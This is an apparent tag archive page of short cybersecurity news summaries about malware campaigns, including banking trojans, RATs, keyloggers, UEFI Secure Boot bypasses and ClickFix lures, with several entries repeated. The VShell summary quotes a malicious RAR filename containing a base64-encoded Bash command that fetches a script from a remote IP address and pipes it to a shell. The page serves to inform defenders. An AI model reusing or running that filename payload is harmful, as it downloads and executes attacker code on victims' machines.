Tag: infection
-
New Banking Malware Exploits WhatsApp to Hijack Your Computer Remotely
Cybersecurity researchers have uncovered a sophisticated malware campaign targeting Brazilian users through WhatsApp, delivering a dangerous new banking Trojan dubbed >>Maverick.
-
GhostBat RAT Android Malware Poses as Fake RTO Apps to Steal Banking Data from Indian Users
The GhostBat RAT campaign leverages diverse infection vectors”, WhatsApp, SMS with shortened URLs, GitHub-hosted APKs, and compromised websites”, to distribute malicious Android droppers. Once installed, these droppers employ multi-stage workflows, deliberate ZIP header manipulation, and heavy string obfuscation to evade antivirus detection and reverse”engineering. The threat actors utilize native libraries (.so) to dynamically resolve API…
-
GhostBat RAT Android Malware Poses as Fake RTO Apps to Steal Banking Data from Indian Users
The GhostBat RAT campaign leverages diverse infection vectors”, WhatsApp, SMS with shortened URLs, GitHub-hosted APKs, and compromised websites”, to distribute malicious Android droppers. Once installed, these droppers employ multi-stage workflows, deliberate ZIP header manipulation, and heavy string obfuscation to evade antivirus detection and reverse”engineering. The threat actors utilize native libraries (.so) to dynamically resolve API…
-
UEFI Shell Flaws Let Hackers Disable Secure Boot on Over 200,000 Laptops
Security researchers have uncovered critical vulnerabilities in signed UEFI shells that allow attackers to completely bypass Secure Boot protections on approximately 200,000 Framework laptops and desktops. These flaws expose a fundamental weakness in firmware security that could enable persistent, undetectable malware infections at the most privileged system level. The vulnerabilities center around legitimate diagnostic tools…
-
UEFI Shell Flaws Let Hackers Disable Secure Boot on Over 200,000 Laptops
Security researchers have uncovered critical vulnerabilities in signed UEFI shells that allow attackers to completely bypass Secure Boot protections on approximately 200,000 Framework laptops and desktops. These flaws expose a fundamental weakness in firmware security that could enable persistent, undetectable malware infections at the most privileged system level. The vulnerabilities center around legitimate diagnostic tools…
-
Risks of Not Aligning with ISO 27001 Remote Access Policy
28% of organizations have become a part of some gruesome cybersecurity incidents, according to a security report released by IBM in 2024. Among the attack vectors of such attacks were malware infections, phishing scams, and unintentional data leaks. To the rescue comes ISO 27001. It provides a framework that helps organizations like yours fight back……
-
Snake Keylogger Uses Weaponized Emails and PowerShell to Steal Sensitive Data
A newly observed information”stealing campaign is deploying a stealthy variant of the SnakeKeylogger malware via weaponized e-mails that masquerade as legitimate remittance advice from CPA Global and Clarivate. Researchers first identified the infection vector on October 7, 2025, when recipients received messages titled “remittance advice for the payment dated 07″Oct”2025,” urging them to download an…
-
Chinese Cybercrime Group Runs Global SEO Fraud Ring Using Compromised IIS Servers
Tags: attack, china, credentials, cybercrime, cybersecurity, fraud, group, india, infection, Internet, microsoft, service, theftCybersecurity researchers have shed light on a Chinese-speaking cybercrime group codenamed UAT-8099 that has been attributed to search engine optimization (SEO) fraud and theft of high-value credentials, configuration files, and certificate data. The attacks are designed to target Microsoft Internet Information Services (IIS) servers, with most of the infections reported in India, Thailand First seen…
-
Chinese Cybercrime Group Runs Global SEO Fraud Ring Using Compromised IIS Servers
Tags: attack, china, credentials, cybercrime, cybersecurity, fraud, group, india, infection, Internet, microsoft, service, theftCybersecurity researchers have shed light on a Chinese-speaking cybercrime group codenamed UAT-8099 that has been attributed to search engine optimization (SEO) fraud and theft of high-value credentials, configuration files, and certificate data. The attacks are designed to target Microsoft Internet Information Services (IIS) servers, with most of the infections reported in India, Thailand First seen…
-
WhatsApp Exploited to Spread SORVEPOTEL Malware on Windows Systems
An aggressive malware campaign dubbed SORVEPOTEL is exploiting WhatsApp messages to infiltrate Windows systems, with its epicenter in Brazil. Rather than pursuing data theft or ransomware extortion, this self-propagating malware is engineered for rapid spread, leveraging social trust and automation to reach new victims. Trend Research telemetry shows that 457 of the 477 detected infections…
-
Industrial Automation Threats Decline Slightly in Q2 2025, but Risks Remain
ICS malware infections fell in Q2 2025, but phishing and evolving threats keep OT environments at risk. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/industrial-automation-threats-decline-slightly-in-q2-2025-but-risks-remain/
-
The Industry’s Passkey Pivot Ignores a Deeper Threat: Device-Level Infections
Passkeys Are Progress, But They’re Not Protection Against Everything The cybersecurity community is embracing passkeys as a long-overdue replacement for passwords. These cryptographic credentials, bound to a user’s device, eliminate phishing and prevent credential reuse. Major players, like Google, Apple, Microsoft, GitHub, and Okta, have made passkey login widely available across consumer and enterprise services….…
-
Hackers Exploit AdaptixC2, an Emerging Open-Source C2 Tool
In early May 2025, Unit 42 researchers observed that AdaptixC2 was used to infect several systems. While many C2 frameworks garner public attention, AdaptixC2 has remained largely under the radar”, until Unit 42 documented its deployment by real-world threat actors. This article examines AdaptixC2’s capabilities, recent infection scenarios, and guidance for defenders to anticipate and…
-
Windows Users Hit by VenomRAT in AI-Driven RevengeHotels Attack
RevengeHotels, also known as TA558, has escalated its long-standing cybercrime campaign by incorporating artificial intelligence into its infection chains, deploying the potent VenomRAT malware against Windows users. Active since 2015, this threat actor has traditionally targeted hotel guests and travelers, stealing payment card data through phishing emails. Recent campaigns, however, demonstrate a marked shift: AI-generated…
-
APT28 Exploits Signal Messenger to Deploy eardShell and Covenant Malware
Sekoia.io’s Threat Detection and Response (TDR) team has uncovered a sophisticated campaign by APT28 that weaponizes Signal Messenger to deploy two previously undocumented malware families”, BeardShell and the Covenant framework. In early 2025, a trusted partner supplied samples that did not match any known infection chain, prompting a joint investigation. On 21 June 2025, CERT-UA…
-
Stealthy AsyncRAT flees the disk for a fileless infection
Tags: access, best-practice, control, credentials, infection, malicious, malware, monitoring, phishing, powershell, rat, theft, threat, update, windowsRAT with evasion and persistence: Once AsyncRAT was loaded, the attackers took steps to disrupt Windows defenses. The report notes techniques such as disabling Anti-malware Scan Interface (AMSI) and tampering with Event Tracking for Windows (ETW), both critical features for runtime detection. To maintain persistence, they created a scheduled task disguised as “Skype Update,” ensuring…
-
New Malware Exploits Exposed Docker APIs to Gain Persistent Root SSH Access
The Akamai Hunt Team has uncovered a new strain of malware that targets exposed Docker APIs with expanded infection capabilities. First observed in August 2025 within Akamai’s honeypot infrastructure, this variant diverges from the June 2025 Trend Micro report by blocking other attackers from accessing the Docker API and delivering a modular payload rather than…
-
XWorm Malware Adopts New Infection Chain to Bypass Security Detection
Cybersecurity researchers have identified a sophisticated evolution in XWorm malware operations, with the backdoor campaign implementing advanced tactics to evade detection systems. The Trellix Advanced Research Center has documented this significant shift in the malware’s deployment strategy, revealing a deliberate move toward more deceptive and intricate infection methods designed to increase success rates while remaining…
-
Mapping the Web of Commercial Spyware: Targets and Attack Chains
A comprehensive new report spanning 2010 to 2025 reveals the ever-evolving landscape of commercial spyware vendors (CSVs), exposing the methods these private firms employ to infiltrate devices, their typical targets, and the infection chains that deliver their covert implants. The study, produced by a leading cybersecurity intelligence firm, underscores the persistent threat posed by CSVs”,…
-
Abandoned Sogou Zhuyin Update Server Hijacked, Weaponized in Taiwan Espionage Campaign
An abandoned update server associated with input method editor (IME) software Sogou Zhuyin was leveraged by threat actors as part of an espionage campaign to deliver several malware families, including C6DOOR and GTELAM, in attacks primarily targeting users across Eastern Asia.”Attackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or…
-
Malicious apps with +19M installs removed from Google Play because spreading Anatsa banking trojan and other malware
Experts found 77 malicious Android apps with 19M+ installs on Google Play, spreading malware, including the Anatsa (TeaBot) banking trojan. While investigating Anatsa (Tea Bot) banking trojan infections, Zscaler’s ThreatLabs discovered seventy-seven malicious Android apps with more than 19 million installs. Several Anatsa decoy apps have each been downloaded more than 50,000 times. The malicious apps…
-
Malicious apps with +19M installs removed from Google Play because spreading Anatsa banking trojan and other malware
Experts found 77 malicious Android apps with 19M+ installs on Google Play, spreading malware, including the Anatsa (TeaBot) banking trojan. While investigating Anatsa (Tea Bot) banking trojan infections, Zscaler’s ThreatLabs discovered seventy-seven malicious Android apps with more than 19 million installs. Several Anatsa decoy apps have each been downloaded more than 50,000 times. The malicious apps…
-
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell.The “Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file,” Trellix researcher Sagar Bade said in a technical write-up.”The payload isn’t hidden inside the file content or a…
-
Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems
Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash The…
-
UNC5518 Group Hacks Legitimate Sites with Fake Captcha to Deliver Malware
The financially motivated threat group UNC5518 has been infiltrating trustworthy websites to install ClickFix lures, which are misleading phony CAPTCHA pages, as part of a complex cyber campaign that has been monitored since June 2024. These malicious pages trick users into executing downloader scripts that initiate infection chains, often leading to malware deployment by affiliated…